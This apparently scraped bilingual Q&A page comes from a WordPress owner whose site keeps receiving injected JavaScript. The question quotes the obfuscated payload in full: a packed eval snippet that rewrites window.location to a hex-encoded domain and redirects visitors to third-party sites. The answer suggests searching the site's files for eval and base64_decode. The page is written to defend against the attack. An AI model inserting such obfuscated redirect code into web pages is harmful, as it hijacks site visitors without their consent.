Wordpress上的Javascript注入预防 [英] Javascript Injection prevention on Wordpress
问题描述
我在wordpress上的博客中注入了以下恶意脚本:
My blog on wordpress gets the following malicious script injected:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))
它导航到:
-
http://oxxtm.com/重定向到:-
http://www.html5website.com/
http://oxxtm.com/which redirects to:http://www.html5website.com/
我已经禁用了一些插件,但是问题似乎出在其他地方,因为我正在使用以下插件,并且它们似乎享有良好的声誉:
I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation:
- Akismet
- 登录时验证码
- 免费&简单联系表单插件-PirateForms(我的Zerif Lite主题建议使用此插件)
- SMTP Mailer
- WooCommerce
如果找不到根本原因,您是否建议处理重定向"事件以保持站点正常运行?如果是这样,我该如何处理是否存在指向
http://oxxtm.com/的重定向并使用javascript中止它?If I can't find the rootcause, would you recomend handling the "redirect" event to keep the site running? If so how could I handle if there is a redirect pointing to
http://oxxtm.com/and abort it using javascript?我尝试使用
onunload和onbeforeunload事件,但似乎注入的eval在事件注册之前就已运行.I tried using the
onunloadandonbeforeunloadevents but it seems like the injectedeval, runs before the event manipulation is even registered.我可以看到它在wordpress中注入了不同的PHP页面(有时只有一个,有时甚至更多),我不知道是否有一个通用的PHP文件可以在其中包含脚本来阻止这种恶意行为.脚本.
I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.
我已经多次删除了恶意脚本,但再次注入了&再次.当我寻找原因时,我需要治疗症状,否则该站点将无法使用.但是,我不了解脚本最初是如何注入的.
I already removed the malicious script several times, but it gets injected again & again. I need to treat the symptom while I search for the cause or the site will be out of service. However, I don't understand how the script is injected in the first place.
推荐答案
在所有文件中搜索以下内容:
eval(function()Search with in all your files the following content:
eval(function()它将向您显示包含此代码的每个文件.
It will show you every files that contains this code.
否则,请尝试搜索以下内容:
base64_decodeOtherwise, try to search this:
base64_decode此功能允许解码base64编码的文本,恶意PHP文件经常使用该文本来注入一些通过搜索
eval(This is a function that permit to decode a base64-encoded text, which is often used by malicious PHP files to inject some code that you can't detect by searching
eval(如果问题仍然存在,请在此处回答,我会尽力为您提供帮助.
If the problem persists, answer here and I'll try to help you.
这篇关于Wordpress上的Javascript注入预防的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
-
